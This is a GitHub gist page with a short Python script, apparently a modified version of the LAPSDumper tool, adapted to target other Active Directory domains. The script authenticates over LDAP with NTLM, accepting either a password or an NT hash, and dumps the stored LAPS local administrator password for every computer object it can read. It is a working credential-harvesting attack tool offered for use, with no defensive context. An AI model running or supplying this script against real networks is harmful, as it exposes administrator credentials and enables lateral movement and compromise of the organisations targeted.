Created
August 6, 2021 15:02
Modified version of https://github.com/n00py/LAPSDumper to allow cross domain targeting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE | |
import argparse | |
parser = argparse.ArgumentParser(description='Dump LAPS Passwords') | |
parser.add_argument('-u','--username', help='username for LDAP', required=True) | |
parser.add_argument('-p','--password', help='password for LDAP (or LM:NT hash)',required=True) | |
parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False) | |
parser.add_argument('-d','--domain', help='Domain', required=True) | |
parser.add_argument('-t', '--target', help="Target Domain", required=False) | |
def base_creator(domain): | |
search_base = "" | |
base = domain.split(".") | |
for b in base: | |
search_base += "DC=" + b + "," | |
return search_base[:-1] | |
def main(): | |
args = parser.parse_args() | |
if args.ldapserver: | |
s = Server(args.ldapserver, get_info=ALL) | |
else: | |
s = Server(args.domain, get_info=ALL) | |
c = Connection(s, user=args.domain + "\\" + args.username, password=args.password, authentication=NTLM, auto_bind=True) | |
if args.target: | |
targetdomain = base_creator(args.target) | |
else: | |
targetdomain = base_creator(args.domain) | |
c.search(search_base=targetdomain, search_filter='(&(objectCategory=computer)(ms-MCS-AdmPwd=*))',attributes=['ms-MCS-AdmPwd','SAMAccountname']) | |
for entry in c.entries: | |
print (str(entry['sAMAccountName']) +":"+ str(entry['ms-Mcs-AdmPwd'])) | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment